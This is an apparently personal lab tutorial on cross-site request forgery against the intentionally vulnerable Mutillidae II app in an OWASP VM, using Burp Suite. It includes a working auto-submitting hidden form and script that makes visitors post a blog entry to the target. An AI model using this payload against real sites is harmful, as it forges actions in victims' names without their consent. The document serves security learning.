(CSRF) Cross-Site Request Forgery
I've been playing around with Web Application Security and wanted to do a writeup on CSRF (pronounced C-SURF). For those of you who are unfamiliar with CSRF, it's the action of sending a POST form to a hacker's specified target site, by having the victim go to a site with your CSRF code on it. That probably sounded more complicated than it really is. Here are the general steps:
- Research the target site and see what params are in the Body.
- Write a <form> that has all the necessary params and values your want to submit.
- Place the code on a website your victim will go to.
- After they visit the site, they will submit the form.
Prerequisites: This tutorial will go over the most basic usage of Burp Suite. If you never used Burp Suite before, this tutorial is for you! You should have some knowledge of how to setup a VM. I won't be going over that, and assume you can setup OWASP Broken WebApp's VM, and get to it via a browser. Same with MAMP.
Firefox - A browser > Internet Explorer
Burp Suite - Setup local proxy to intercept browser traffic
MAMP (macOS, Apache, MySQL, PHP) - Launches a local Web Server (There's also WAMP for Windows and LAMP for GNU Linux)
OWASP Broken Web Applications - A very vulnerable Web Server for learning
Virtualbox - Virtualize the OWASP VM
Visual Code Studio (any IDE or text editor will work)
Here is how our network is configure.
- 192.168.56.101 - OWASP VM
- 192.168.56.1 - Virtual Router and MAMP Server
Yours might look different. The only nesessary thing, is that both web servers can talk to each other.
Burp Suite Setup
Firefox Settings: Proxy
Perfect. Now, given that the both your MAMP and OWASP VM are running AND able to connect to one another, let's continue to gather information about the form. (I should warn, NEVER connect vulnerable VM boxes directly to the internet. The best configuration is to setup your Host OS (in this case, my Mac), and your Guest OS (the OWASP VM) on a virtual network. In Virutalbox, you can do this by clicking Settings > Network and set the NIC to attach Host-only Adapter.
Great! Now let's navigate to the CSRF portion of this VM.
When your server is launched, you should see this page by putting its IP in your browser. We will be going through the Mutillidae II tutorial so click the button!
...but wait. Somethings wrong. It didn't take us to the next page. It's taking forever and just hanging. This is because the request is hanging out in our Burp Suite Proxy! Let's take a look.
By clicking the Forward button, the request is sent to the server and we can continue.
Now we will navigate to the CSRF page.
OWASP 2013 > A8 Cross-Site Request Forgery (CSRF) > Add to your blog
Don't forget to forward your request in your Burp Suite!
The next page will have blog posts of user "anonymous". This means the website allows for anyone to post blogs. Let's exploit the ability to post blogs via CSRF.
Now's the fun part! Let's post something as anon, and review the request. Cardi B lyrics seems appropriate as of Nov 14th, 2017. I'm sure this won't date well, but whatever. =]
Once we input our lyrics and click Save Blog Entry, we head over to our Burp Suite to see it catch the POST
What we want to do here is gather all the information for the Body Params. In our case, it is the following:
- csrf-token = NULL
- blog_entry = "My pussy glitter as gold"
- add-to-your-blog-php-submit-button = "Save Blog Entry"
Awesome! Along with the website's url, we now have all the information we need. Muahaha. Time to head over to our MAMP webserver and place a file in there.
Your front page will probably look different. I just change my index.html file and put this there. We will now be creating the website that will force any user who visits the page to submit a blog post to the OWASP website. Programming time!
What we're going to want to do, is create a <form> with all the body params, and then create a <script> that submits the form.
Here, we need to supply the address of the website we want to POST to in the action for the form. Thereafter, we simply put the name and associated values for our form.
<!-- Form Post --> <form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" method="POST"> <input type="hidden" name='csrf-token' value=''> <input type="hidden" name='blog_entry' value='This entry was totally hacked!'> <input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'> </form>
Sweet! Now just for some fun, I added a photo and a few words into the file I created, named blog.html. Here is the code on the bottom.
<html> <center> <body><h1>Welcome to My Website!</h1> If you're reading this, you probably have been hacked.<br><br> <img src="http://weknowmemes.com/wp-content/uploads/2011/11/free-shrugs.jpg"></body><br> Sorry, not sorry.<br> <!-- Form Post --> <form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" method="POST"> <input type="hidden" name='csrf-token' value=''> <input type="hidden" name='blog_entry' value='This entry was totally hacked!'> <input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'> </form> <script>document.csrf.submit();</script> <!-- End Form Post --> </center></body> </html>
Let's go visit the website, and see what happens on OWASPs side! BUT BEFORE, flip off the Intercept button on your Burp Suite Proxy. Makes things go smoother.
Success! We successfully made the visitor to my MAMP website, submit a form to the OWASP website!
Cons: One of the issues is that it redirects the submitted website. I attempted something like <script>window.location.replace("http://stackoverflow.com");</script>
But it didn't seem to work. Maybe there's a way to submit a request, but also have the site send you back to the form site? But then there'd be a loop...Any insight on this would be appreciated!